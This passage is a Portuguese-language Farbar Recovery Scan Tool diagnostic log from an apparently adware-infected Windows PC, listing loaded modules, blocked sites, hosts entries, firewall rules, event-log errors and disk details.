(x86)\CalendarTool\2.0.0.11189\EVPTask.dll 2015-12-25 05:42 - 2015-12-25 05:42 - 00406664 _____ () C:\Program Files (x86)\CalendarTool\2.0.0.11189\EVPNet.dll 2015-12-25 05:41 - 2015-12-25 05:41 - 00428680 _____ () C:\Program Files (x86)\CalendarTool\2.0.0.11189\EVPDR.dll 2016-02-28 12:24 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll 2016-03-13 15:13 - 2016-03-13 15:13 - 11845632 _____ () c:\program files\wnen\WNEnlibs\blpskt.dll 2015-12-07 13:53 - 2013-01-15 17:47 - 00893248 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\webres.dll 2016-03-13 15:18 - 2016-03-13 15:18 - 00011264 _____ () C:\Users\Claudemir\AppData\Local\Temp\nsxBA5B.tmp\System.dll 2016-02-18 08:33 - 2016-02-18 08:33 - 00780288 _____ () C:\Program Files\Common Files\ShopperPro3\spbici32.dll 2015-12-16 18:39 - 2016-03-04 15:51 - 00096768 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\chrome_elf.dll 2016-01-01 18:53 - 2015-12-22 04:49 - 00154712 _____ () C:\Program Files (x86)\Google\Chrome\Application\WTSAPI32.dll 2016-01-01 18:52 - 2016-02-18 18:54 - 01111040 _____ () C:\ProgramData\{87FF6F3C-D77D-BEBA-66FB-CE38B6791DB6}\2.3.5.56\nore.dll 2016-03-13 15:13 - 2016-03-13 15:13 - 11845632 _____ () c:\program files\wnen\wnenlibs\blpskt.dll 2016-01-04 10:05 - 2016-03-04 15:51 - 00732160 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\chrome_elf_wk.dll 2015-12-16 18:39 - 2015-12-11 00:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll 2015-12-16 18:39 - 2015-12-11 00:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll 2015-11-29 18:26 - 2015-08-11 05:49 - 01903616 _____ () C:\Users\Claudemir\AppData\Local\Chromium\Application\46.0.2480.0\libglesv2.dll 2015-11-29 18:26 - 2015-08-11 05:49 - 00075264 _____ () C:\Users\Claudemir\AppData\Local\Chromium\Application\46.0.2480.0\libegl.dll 2015-12-24 18:18 - 2015-12-24 18:18 - 16307888 _____ () C:\Windows\SysWOW64\Macromed\Flash\pepflashplayer32_18_0_0_209.dll 2016-03-13 14:14 - 2016-03-13 14:14 - 01412824 ____N () C:\ProgramData\8f23bb0e-d21d-43d3-bd7b-a0fba15a3b5e\plugincontainer.exe ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Gurqov => ""="service" ==================== EXE Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\008k.com -> 008k.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\00hq.com -> 00hq.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\0scan.com -> 0scan.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\1-domains-registrations.com -> 1-domains-registrations.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\1-se.com -> 1-se.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\1001movie.com -> 1001movie.com IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\1001night.biz -> 1001night.biz IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\100gal.net -> 100gal.net IE restricted site: HKU\S-1-5-21-1295429606-633391922-1787662347-1000\...\100sexlinks.com -> 100sexlinks.com Existem ainda 4788 sites a mais. ==================== Hosts Conteúdo: ========================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2016-01-03 13:41 - 2015-12-24 18:10 - 00000143 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-1295429606-633391922-1787662347-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 82.163.143.189 - 82.163.142.189 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Firewall do Windows está desabilitado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == (Atualmente não há nenhuma correção automática para esta seção.) ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [{422C514D-DA62-45C6-AF73-60A5CF5D22B2}] => (Allow) C:\Users\Claudemir\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{444FDEFF-25E3-40D8-A157-4F3B015FCFA3}] => (Allow) C:\Users\Claudemir\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [TCP Query User{44EE5434-2321-4A80-9A4E-90EE881366E5}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [UDP Query User{960BE69D-A8CD-4878-8406-9F1930A90C96}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [TCP Query User{5B61E728-AF8D-4DD9-9474-07638A8F1D91}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [UDP Query User{EFD86183-F366-45F2-8197-E0920A1D237F}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [TCP Query User{8770A3E2-9A89-4F99-94EF-2BDDB0451FA3}C:\program files (x86)\ares\chatserver.exe] => (Allow) C:\program files (x86)\ares\chatserver.exe FirewallRules: [UDP Query User{792C7503-84F2-46ED-AC07-5B387BC05EDC}C:\program files (x86)\ares\chatserver.exe] => (Allow) C:\program files (x86)\ares\chatserver.exe FirewallRules: [{1CEFB87D-C2A0-42A9-AC74-EE6970750FDB}] => (Allow) C:\Program Files (x86)\Nero\Nero 2016\Nero Burning ROM\StartNBR.exe FirewallRules: [{8DD1C885-F41D-438E-8585-A3E3342DF589}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe FirewallRules: [{3D2B6896-179B-4D53-8A7F-43535143AFF4}] => (Allow) C:\Program Files (x86)\Nero\Nero 2016\Nero Burning ROM\nero.exe FirewallRules: [{2D9703EF-9C28-42B1-A26F-CE7A5C60B8C2}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{CF7C90A4-AF56-4347-8198-E1E2B9D1562B}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{AD10C3BF-10FC-4304-9386-C8F39CE0958A}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{8E83FB6B-3387-4E6A-B60E-A52454572EEE}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{D9728A41-38D6-4915-AA1F-99B32A405841}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [UDP Query User{B4DCAB3C-B8B2-4889-A91E-57A08B76B457}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{D6280F5B-481D-4EFE-8AF7-B9F611FED09B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{F8753396-C58E-4FEB-A747-4CDA1C9DB9EF}] => (Allow) C:\Users\Claudemir\AppData\Local\BoBrowser\Application\bobrowser.exe FirewallRules: [{29A48070-1D75-4313-9027-D0A96D7C4990}] => (Allow) C:\Program Files (x86)\SimpleFiles\SimpleFiles.exe FirewallRules: [{5DF495B5-44C0-4034-BABD-202515828823}] => (Allow) C:\Program Files (x86)\SimpleFiles\SimpleFiles.exe FirewallRules: [{5303721F-E2A2-44FC-AEBB-211DF4D932DE}] => (Allow) C:\Program Files (x86)\SimpleFiles\downloader.exe FirewallRules: [{85208D34-5F4B-4554-8356-B1F18DA4C07C}] => (Allow) C:\Program Files (x86)\SimpleFiles\downloader.exe FirewallRules: [{DC0A432D-1BD1-41DC-B35E-5D7D9A392CEF}] => (Allow) C:\Program Files (x86)\speed browser\Application\browser.exe FirewallRules: [TCP Query User{35529C37-58FB-401A-862D-B95367ABD5C0}C:\programdata\microsoft\network\dsq\network\sysnetwk.exe] => (Block) C:\programdata\microsoft\network\dsq\network\sysnetwk.exe FirewallRules: [UDP Query User{01427D39-16F6-4FC2-AA43-D6927427E2E0}C:\programdata\microsoft\network\dsq\network\sysnetwk.exe] => (Block) C:\programdata\microsoft\network\dsq\network\sysnetwk.exe FirewallRules: [{5D83A099-BF95-4425-A655-C721F6FE1382}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe FirewallRules: [{B768225C-EC62-42D6-8836-66DB1B051FB8}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe FirewallRules: [{1C85F851-7355-4C4F-96BF-B5815A1EB8D0}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{D1FE451C-4362-4CD3-AF51-1318D160E159}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{040C922C-2FFD-4E01-A140-905BC62435E6}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{05B55F03-A994-4080-BC6B-6FC976ED32BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{6BAEB4C3-1A14-4B70-A6B9-1F88DCB34DCB}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe ==================== Pontos de Restauração ========================= 01-01-2016 11:28:39 Uniblue DriverScanner installation 02-01-2016 23:25:01 Windows Update 03-01-2016 15:45:39 Installed Adblock Plus for IE (32-bit and 64-bit) 05-01-2016 11:21:03 IObit Uninstaller restore point 06-03-2016 16:45:09 Windows Update 11-03-2016 21:40:28 Windows Update 11-03-2016 22:14:19 Windows Update ==================== Dispositivos Apresentando Falhas No Gerenciador ============= Name: Dispositivo Periférico Bluetooth Description: Dispositivo Periférico Bluetooth Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Dispositivo Periférico Bluetooth Description: Dispositivo Periférico Bluetooth Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (03/13/2016 03:34:29 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: plugincontainer.exe, versão: 1.0.5916.18361, carimbo de hora: 0x56e59f77 Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8 Código de exceção: 0xc0000005 Deslocamento com falha: 0x705342c3 Identificação do processo com falha: 0x7b8 Hora de início do aplicativo com falha: 0xplugincontainer.exe0 Caminho do aplicativo com falha: plugincontainer.exe1 FCaminho do módulo de falhas: plugincontainer.exe2 Identificação do Relatório: plugincontainer.exe3 Error: (03/13/2016 03:28:48 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: plugincontainer.exe, versão: 1.0.5916.18361, carimbo de hora: 0x56e59f77 Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8 Código de exceção: 0xc0000005 Deslocamento com falha: 0x705342c3 Identificação do processo com falha: 0x1e94 Hora de início do aplicativo com falha: 0xplugincontainer.exe0 Caminho do aplicativo com falha: plugincontainer.exe1 FCaminho do módulo de falhas: plugincontainer.exe2 Identificação do Relatório: plugincontainer.exe3 Error: (03/13/2016 03:25:39 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: plugincontainer.exe, versão: 1.0.5916.18361, carimbo de hora: 0x56e59f77 Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8 Código de exceção: 0xc0000005 Deslocamento com falha: 0x705342c3 Identificação do processo com falha: 0x1e94 Hora de início do aplicativo com falha: 0xplugincontainer.exe0 Caminho do aplicativo com falha: plugincontainer.exe1 FCaminho do módulo de falhas: plugincontainer.exe2 Identificação do Relatório: plugincontainer.exe3 Error: (03/13/2016 03:19:20 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: plugincontainer.exe, versão: 1.0.5916.18361, carimbo de hora: 0x56e59f77 Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8 Código de exceção: 0xc0000005 Deslocamento com falha: 0x705342c3 Identificação do processo com falha: 0x1534 Hora de início do aplicativo com falha: 0xplugincontainer.exe0 Caminho do aplicativo com falha: plugincontainer.exe1 FCaminho do módulo de falhas: plugincontainer.exe2 Identificação do Relatório: plugincontainer.exe3 Error: (03/13/2016 03:18:41 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: ) Description: Serviço não pode ser iniciado. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run. em BlueStacks.hyperDroid.Service.Service.OnStart(String[] args) em System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state) Error: (03/13/2016 03:15:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: plugincontainer.exe, versão: 1.0.5916.18361, carimbo de hora: 0x56e59f77 Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8 Código de exceção: 0xc0000005 Deslocamento com falha: 0x705342c3 Identificação do processo com falha: 0xa20 Hora de início do aplicativo com falha: 0xplugincontainer.exe0 Caminho do aplicativo com falha: plugincontainer.exe1 FCaminho do módulo de falhas: plugincontainer.exe2 Identificação do Relatório: plugincontainer.exe3 Error: (03/13/2016 03:13:48 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 257) (User: ) Description: Falha dos Serviços de Criptografia ao inicializar o Catálogo do Banco de Dados. Erro do ESENT:-550. Error: (03/13/2016 03:13:47 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (03/13/2016 03:12:54 PM) (Source: ESENT) (EventID: 455) (User: ) Description: taskhost (1012) WebCacheLocal: Erro -1811 (0xfffff8ed) ao abrir o arquivo de log C:\Users\Claudemir\AppData\Local\Microsoft\Windows\WebCache\V01.log. Error: (03/13/2016 03:09:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nome de aplicativo com falha: chrome.exe, versão: 47.0.2526.106, carimbo de hora: 0x566a3406 Nome do módulo de falhas: BtMmHook.dll, versão: 6.3.0.8800, carimbo de hora: 0x4e56aced Código de exceção: 0x40000015 Deslocamento com falha: 0x00011958 Identificação do processo com falha: 0x1748 Hora de início do aplicativo com falha: 0xchrome.exe0 Caminho do aplicativo com falha: chrome.exe1 FCaminho do módulo de falhas: chrome.exe2 Identificação do Relatório: chrome.exe3 Erros de Sistema: ============= Error: (03/13/2016 03:37:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:33:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Update Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:32:57 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Service Mgr SearchWindowResults, mas essa ação falhou com o seguinte erro: %%1056 Error: (03/13/2016 03:31:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:28:49 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:26:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Update Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:25:41 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:22:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. Error: (03/13/2016 03:19:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço Service Mgr SearchWindowResults foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço. CodeIntegrity: =================================== Date: 2015-12-24 19:59:11.750 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:59:11.659 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:59:11.569 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:56:05.476 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:56:05.430 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:55:11.487 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:55:11.438 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:54:45.664 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:54:45.585 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2015-12-24 19:54:31.572 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz Percentagem de memória em uso: 86% RAM física total: 2932.54 MB RAM física disponível: 382.88 MB Virtual Total: 5863.29 MB Virtual disponível: 1885.93 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:141.84 GB) (Free:73.46 GB) NTFS Drive d: () (Fixed) (Total:78.03 GB) (Free:69.34 GB) NTFS Drive e: () (Fixed) (Total:78.12 GB) (Free:76.34 GB) NTFS ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 86BF6871) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=78 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=78.1 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=141.8 GB) - (Type=07 NTFS) ==================== Fim de Addition.txt ============================